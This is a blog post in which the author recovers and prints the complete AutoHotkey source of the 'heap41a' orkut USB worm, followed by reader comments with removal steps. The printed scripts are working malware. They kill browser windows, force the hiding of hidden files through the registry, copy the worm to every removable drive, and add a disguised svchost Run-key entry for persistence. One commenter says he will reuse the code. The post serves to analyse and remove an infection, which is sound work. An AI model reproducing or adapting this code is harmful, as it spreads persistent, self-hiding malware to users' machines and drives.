Virus Decoded

Hi,

A few days back I got a message pop up every time I opened my Mozilla Firefox web browser.

I decoded the virus by opening my task manager every time the  application opened.Right clicked on the application, and then selected ‘Go to process’. By ending the process it pointed to I could stop the virus and browse the internet easily. This time I clicked on the debug process, the virus pointed to. On debugging it , I couldn’t get the code, but I got the path to the file , which was ‘C:\heap41a\scvhost.exe’. But going to c:\ I couldn’t see any folder named heap41a. I simply typed the location in my explorer and suddenly a list of files opened.

script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r        OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30
return
}

}
return
std.txt

#notrayicon
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

9 thoughts on “Virus Decoded

  1. hii..
    even my system is infected with the following virus can you suggest me any methods to get rid of it..
    thank you
    -rev

  2. hii..
    even my system is infected with the following virus can you suggest me any methods to get rid of it..
    thank you!!

  3. Hey budy This is much easier than i posted in My Blog earlier on the same concept but my suggetions are tecqnical and difficult.I hope your Tip to remove orkut virus will be the simplest one i have ever seen.()

    Hey budy This is much easier than i posted in My Blog earlier on the same concept but my suggetions are tecqnical and difficult.I hope your Tip to remove orkut virus will be the simplest one i have ever seen.()

    Hey budy This is much easier than i posted in My Blog earlier on the same concept but my suggetions are tecqnical and difficult.I hope your Tip to remove orkut virus will be the simplest one i have ever seen.()

  4. I removed this a while ago this is wat i did.
    1) Ctrl + alt + Del
    2) Go To Process – Stop Svchost [THE ONE WHICH HAS A USER = YOUR USER NAME NOT SYSTEM]
    3)Start run “C:\heap41a” . [DeleteSVCHOST.exe, if you cant repeat step 2], the others you will delete later

    4)open the reproduce.txt file and go to the appropriate registry key [if your not sure how to do this, ill explain more later] and delete the key that was added.
    [THIS IS HOW THE VIRUS REPRODUCES, IT LOCK THE ABILITY TO VIEW HIDDEN FILES SO YOU WILL NEVER SEE THE HIDDEN FILES, WHICH ARE PRESENT IN YOUR OTHER DRIVES E: , F: AND PEN DRIVES]
    … The Registry key added is what is blockin this change

    5)Now if you cant do that an alternate is to use dos, dir /a shows hidden files. see if you find anythin strange in your other drives and delete them with care.
    [Not Sure but there should be a folder with your user name and this should have the virus in it]

    6)If you can view hidden files, search your drives in the main area ie. e: d: etc there should be an odd folder[Maybe your username] check the folder and delete files if suspicious.

    7)Check all pendrives.
    8) The Virus is svchost.exe – just use task manager to stop it. [THE One with the second column not system]

  5. This is actually some great coding, im goin to use the code to control my computer. Insteand of the junk happenin when orkut is typed. Im going to send messages to my computer via msn. and according to the text send i will perform actions on my computer. Server admins, you can use this can be very usefull.

  6. That thing came from my memory stick which was infected in a picture shop. All started with a folder in C:\Documents and Settings\Username\LocalSettings\MicrosoftPowerPoint\2.mp3

    I just clean the regestry and delete this folder and the heap41a\ one also

    I cleaned my memory stick from this file

    J:\autorun.inf is the TR/StarterAEO

    and also these two suspiscious ones:

    4A83D000
    20070523.RUN

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s